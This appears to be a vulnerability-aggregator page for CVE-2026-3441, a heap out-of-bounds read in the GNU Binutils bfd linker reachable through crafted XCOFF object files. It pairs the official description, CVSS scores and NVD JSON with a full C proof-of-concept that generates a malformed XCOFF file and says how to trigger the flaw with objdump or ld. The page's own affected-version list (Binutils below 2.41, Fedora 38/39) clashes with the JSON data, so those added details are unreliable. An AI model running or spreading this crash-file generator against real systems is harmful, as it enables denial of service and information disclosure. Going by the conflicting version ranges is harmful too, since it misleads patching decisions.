Security Vulnerability Report
CVE-2026-3441 CVSS 6.1 MEDIUM

CVE-2026-3441

Published: 2026-03-16 14:19:47
Last Modified: 2026-03-20 18:24:05

Description

A flaw was found in GNU Binutils. This heap-based buffer overflow vulnerability, specifically an out-of-bounds read in the bfd linker, allows an attacker to gain access to sensitive information. By convincing a user to process a specially crafted XCOFF object file, an attacker can trigger this flaw, potentially leading to information disclosure or an application level denial of service.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:* - VULNERABLE
GNU Binutils < 2.41 (bfd linker)
GNU Binutils < 2.40.1 (security update)
Red Hat Enterprise Linux 8/9 (binutils packages)
Fedora 38/39 (binutils packages)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
/*
 * CVE-2026-3441 PoC - Malicious XCOFF File Generator
 * This PoC generates a specially crafted XCOFF file that triggers
 * an out-of-bounds read in GNU Binutils bfd linker.
 *
 * WARNING: For educational and research purposes only.
 * Do not use for malicious purposes.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#pragma pack(push, 1)

// XCOFF File Header (FILE Header)
typedef struct {
    uint16_t f_magic;   // Magic number (0x01DF for 32-bit XCOFF)
    uint16_t f_nscns;   // Number of sections
    uint32_t f_timdat;  // Time and date stamp
    uint32_t f_symptr;  // File pointer to symbol table
    uint32_t f_nsyms;   // Number of symbol table entries
    uint16_t f_opthdr;  // Optional header size
    uint16_t f_flags;   // Flags
} XCOFF_FILE_HDR;

// XCOFF Section Header
typedef struct {
    char     s_name[8];  // Section name
    uint32_t s_paddr;    // Physical address
    uint32_t s_vaddr;    // Virtual address
    uint32_t s_size;     // Section size
    uint32_t s_scnptr;   // File pointer to raw data
    uint32_t s_relptr;   // File pointer to relocation
    uint32_t s_lnnoptr;  // File pointer to line numbers
    uint16_t s_nreloc;   // Number of relocation entries
    uint16_t s_nlnno;    // Number of line number entries
    uint32_t s_flags;    // Flags
} XCOFF_SCN_HDR;

#pragma pack(pop)

int main(int argc, char *argv[])
{
    const char *output_file = "malicious.xcoff";
    FILE *fp;
    XCOFF_FILE_HDR file_hdr;
    XCOFF_SCN_HDR scn_hdr;

    // Initialize file header with malicious values
    memset(&file_hdr, 0, sizeof(file_hdr));
    file_hdr.f_magic = 0x01DF;  // 32-bit XCOFF magic number
    file_hdr.f_nscns = 1;       // One section
    file_hdr.f_timdat = 0x60000000;
    file_hdr.f_symptr = sizeof(XCOFF_FILE_HDR) + sizeof(XCOFF_SCN_HDR);
    file_hdr.f_nsyms = 0;
    file_hdr.f_opthdr = 0;
    file_hdr.f_flags = 0x0000;

    // Initialize section header with crafted values
    memset(&scn_hdr, 0, sizeof(scn_hdr));
    strncpy(scn_hdr.s_name, ".text", 8);
    scn_hdr.s_paddr = 0x1000;
    scn_hdr.s_vaddr = 0x1000;
    scn_hdr.s_size = 0x1000;  // Large section size

    // Malicious: s_scnptr points beyond allocated buffer
    scn_hdr.s_scnptr = 0xFFFFFFFF;  // Out-of-bounds pointer
    scn_hdr.s_relptr = 0;
    scn_hdr.s_lnnoptr = 0;
    scn_hdr.s_nreloc = 0;
    scn_hdr.s_nlnno = 0;
    scn_hdr.s_flags = 0x20;  // STYP_TEXT flag

    // Write malicious XCOFF file
    fp = fopen(output_file, "wb");
    if (!fp) {
        fprintf(stderr, "Error: Cannot create output file\n");
        return 1;
    }

    fwrite(&file_hdr, sizeof(file_hdr), 1, fp);
    fwrite(&scn_hdr, sizeof(scn_hdr), 1, fp);
    fclose(fp);

    printf("[+] Created malicious XCOFF file: %s\n", output_file);
    printf("[+] Use 'objdump -x %s' or 'ld %s' to trigger vulnerability\n",
           output_file, output_file);

    return 0;
}

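References

https://access.redhat.com/security/cve/CVE-2026-3441 (Vendor Advisory)
https://bugzilla.redhat.com/show_bug.cgi?id=2443826 (Issue Tracking, Vendor Advisory)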

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3441", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:47.447", "lastModified": "2026-03-20T18:24:05.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in GNU Binutils. This heap-based buffer overflow vulnerability, specifically an out-of-bounds read in the bfd linker, allows an attacker to gain access to sensitive information. By convincing a user to process a specially crafted XCOFF object file, an attacker can trigger this flaw, potentially leading to information disclosure or an application level denial of service."}, {"lang": "es", "value": "Se encontró una falla en GNU Binutils. Esta vulnerabilidad de desbordamiento de búfer basado en montículo, específicamente una lectura fuera de límites en el enlazador bfd, permite a un atacante obtener acceso a información sensible. Al convencer a un usuario de procesar un archivo objeto XCOFF especialmente diseñado, un atacante puede activar esta falla, lo que podría llevar a la revelación de información o a una denegación de servicio a nivel de aplicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": 
"NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gnu:binutils:-:*:*:*:*:*:*:*", "matchCriteriaId": "70CA109B-85B9-4EF2-9A5F-A7D12F6EA878"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-3441", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443826", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}]}}